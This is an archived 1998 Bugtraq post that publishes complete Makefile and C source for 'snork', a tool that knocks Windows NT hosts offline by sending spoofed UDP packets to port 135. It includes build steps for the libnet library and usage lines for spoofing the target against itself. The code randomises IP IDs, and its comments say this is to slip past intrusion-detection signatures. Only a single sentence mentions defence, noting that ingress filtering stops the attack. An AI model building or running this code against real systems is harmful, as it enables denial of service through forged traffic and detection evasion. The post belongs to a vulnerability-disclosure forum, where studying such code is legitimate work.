Everhart, Glenn From: route@RESENTMENT.INFONEXUS.COM Sent: Tuesday, September 29, 1998 6:36 PM To: BUGTRAQ@NETSPACE.ORG Subject: Snork exploit Snork exploit code as per the ISS X-force advisory. Needs libnet. http://www.infonexus.com/~daemon9/Libnet. This exploit painfully easy to prevent at the point of ingress. Let's hop to it, huh? You can extract the Makefile and C code via the Phrack Magazine extraction utility, or just manually seperate the files. <++> Snork/Makefile # route|daemon9 CFLAGS = -O3 -funroll-loops -fomit-frame-pointer -pipe -m486 -Wall OBJECTS = snork.o LIBS = -lnet .c.o: $(CC) $(CFLAGS) $(DEFINES) -c $< -o $@ all: snork snork: $(OBJECTS) $(CC) snork.o $(LIBS) -o ./snork dist: clean @(cd ..; rm snork.tgz; tar cvzf snork.tgz Snork/) clean: rm -f core snork *.o # EOF <--> <++> Snork/snork.c /* * $Id: snork.c,v 1.1 1998/09/29 05:20:15 root Exp root $ * * snork.c - Windows NT UDP killer * * Written as per the ISS X force advisory. * * Building: * * This compiles under: OpenBSD, FreeBSD, Linux, Solaris and possibly others. * (Solaris port remains broken until libnet gets fixed for solaris checksums). * You need libnet to compile this exploit. It's all very simple: * 1) get the library from http://www.infonexus.com/~daemon9/Libnet * 2) build the library. * 3) install the library. * 4) compile this exploit. * * Usage: * * ./snork target * Spoofs packets from target to target. * * ./snork source target * Spoofs packets from source to target. * * route|daemon9 * */ #include #include #define SENDAMT 10 #define SPORT 135 #define DPORT 135 int main(int argc, char **argv) { int sock, c, i, payload_s; u_char *buf, *payload; u_long ip_src, ip_dst; if (argc > 3 || argc < 2) { fprintf(stderr, "No retard.\nUsage:\tsnork [source] target\n"); exit(EXIT_FAILURE); } if ((ip_src = name_resolve(argv[1], 1)) == -1) { fprintf(stderr, "What the hell kind of IP address is: `%s`?\n", argv[1]); exit(EXIT_FAILURE); } if (argc == 3) { if ((ip_dst = name_resolve(argv[2], 1)) == -1) { fprintf(stderr, "What the hell kind of IP address is: `%s`?\n", argv[1]); exit(EXIT_FAILURE); } } else { ip_dst = ip_src; } printf("Hi. Read Phrack. Thanks.\n"); if ((payload = getenv("HOST")) == NULL) { payload = "i am lame dos kid but i read phrack so it's ok"; } payload_s = strlen(payload); buf = malloc(UDP_H + IP_H + payload_s); if (!buf) { perror("No memory for packet header"); exit(1); } /* * Don't use raw sockets. They suck. */ sock = open_raw_sock(IPPROTO_RAW); if (sock == -1) { perror("No socket"); exit(1); } /* * We will randomize the ip_id for good measure. I've seen crappy NIDS * code that looks for exploits like this by fixing in on static header * fields. */ seed_prand(); for (i = 0; i < SENDAMT; i++) { /* * Build the IP header. */ build_ip(UDP_H + payload_s, /* total payload size */ get_prand(PRu16), /* IP ID */ 0, /* fragmentation bits */ 64, /* IP TTL */ IPPROTO_UDP, /* transport protocol */ ip_src, /* source IP */ ip_dst, /* destination IP */ NULL, /* payload pointer */ 0, /* payload size */ buf); /* packet header memory */ /* * Build the UDP header. */ build_udp(SPORT, DPORT, payload, payload_s, buf + IP_H); /* * UDP checksum (IP check is done by mr kernel, as always). */ do_checksum(buf, IPPROTO_UDP, UDP_H + payload_s); /* * Write the packet to the network. */ c = write_ip(sock, buf, UDP_H + IP_H + payload_s); if (c < UDP_H + IP_H + payload_s) { fprintf(stderr, "write_ip: only wrote %d bytes\n", c); } fprintf(stderr, "."); /* no buffering, please */ } printf("\nsnork snork\n"); free(buf); exit (EXIT_SUCCESS); } /* EOF */ <--> -- I live a world of paradox... My willingness to destroy is your chance for improvement, my hate is your fate -- my failure is your victory, a victory that won't last.